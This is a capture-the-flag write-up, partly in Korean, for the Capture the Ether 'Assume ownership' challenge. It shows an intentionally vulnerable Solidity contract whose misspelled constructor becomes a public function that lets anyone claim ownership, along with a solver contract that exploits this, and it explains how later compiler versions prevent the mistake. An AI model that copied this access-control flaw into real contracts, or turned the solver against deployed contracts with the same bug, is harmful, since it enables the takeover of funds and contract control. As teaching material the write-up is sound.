Capture the Ether - Assume ownership

problem link

pragma solidity ^0.4.21;
 
// Intentionally vulnerable challenge contract. It targets Solidity ^0.4.21, where a
// constructor is declared as a function whose name exactly matches the contract name.
contract AssumeOwnershipChallenge {
    // Account allowed to pass authenticate(). The only assignment in this contract
    // is inside AssumeOwmershipChallenge() below.
    address owner;
    // Becomes true once authenticate() succeeds.
    bool public isComplete;
 
    // NOTE: the name is spelled "Owmership", not "Ownership", so it does not match
    // the contract name. The compiler therefore treats it as an ordinary public
    // function instead of a constructor: it does not run at deployment, and any
    // account can call it at any time to overwrite owner with its own address.
    function AssumeOwmershipChallenge() public {
        owner = msg.sender;
    }
 
    // Marks the challenge complete; reverts unless the caller equals owner.
    // The check is only as strong as the protection on the code that sets owner,
    // and here that code is callable by anyone.
    function authenticate() public {
        require(msg.sender == owner);
 
        isComplete = true;
    }
}

풀이

    // Intended as the constructor, but the name is misspelled ("Owmership"), so it is
    // compiled as a regular public function with no access control.
    function AssumeOwmershipChallenge() public {
        owner = msg.sender; // whoever calls this becomes owner
    }

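생성자 이름에 오타가 있다(Ownership이 아니라 Owmership). Solidity 0.4.x에서는 컨트랙트와 이름이 정확히 같은 함수만 생성자로 취급되므로, 이 함수는 생성자가 아니라 일반 함수로 컴파일된다. public이므로 아무나 호출이 가능하고, 호출한 주소가 owner가 된다.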

// SPDX-License-Identifier: MIT
 
pragma solidity ^0.8.7;
 
// Minimal interface for the deployed challenge contract, declaring only the
// functions the solver calls.
interface AssumeOwnershipChallenge {
    // The misspelled would-be constructor; on the challenge it is a plain public
    // function that sets owner to the caller.
    function AssumeOwmershipChallenge() external;
    // Sets isComplete to true when the caller equals owner; reverts otherwise.
    function authenticate() external;
    // Getter generated for the challenge's public isComplete variable.
    function isComplete() external view returns (bool);
}
 
// Solver for the challenge: demonstrates that the missing access control on the
// misspelled function lets an arbitrary caller take ownership.
contract AssumeOwnershipSolver {
    // Deployer of this solver. Recorded in the constructor but not read anywhere
    // in this contract.
    address payable public owner;
    // Handle to the challenge instance passed to the constructor.
    AssumeOwnershipChallenge public problem;
 
    // _problem: address of the deployed challenge contract.
    constructor (address _problem) {
        owner = payable(msg.sender);
        problem = AssumeOwnershipChallenge(payable(_problem));
    }
 
    // Both calls are made by this contract, so inside the challenge msg.sender is
    // this contract's address: the first call stores it as owner, and the second
    // then satisfies the msg.sender == owner check.
    function solve() public {
        problem.AssumeOwmershipChallenge();
        problem.authenticate();
 
        // Revert the whole transaction if the challenge was not marked complete.
        require(problem.isComplete(), "fail");
    }
}

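위의 AssumeOwnershipSolver가 공격 코드이다. 실제로도 이런 어이없는 버그가 일어나긴 하므로 문제로 만든 것 같다. Solidity 0.4.22부터는 constructor 키워드로 생성자를 선언할 수 있고, 0.5.0부터는 컨트랙트 이름과 같은 함수를 생성자로 쓰는 방식이 제거되었으므로 최신 컴파일러에서는 이런 실수가 컴파일 단계에서 걸러진다.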


tags: writeup, blockchain, solidity, smart contract, access control vulnerability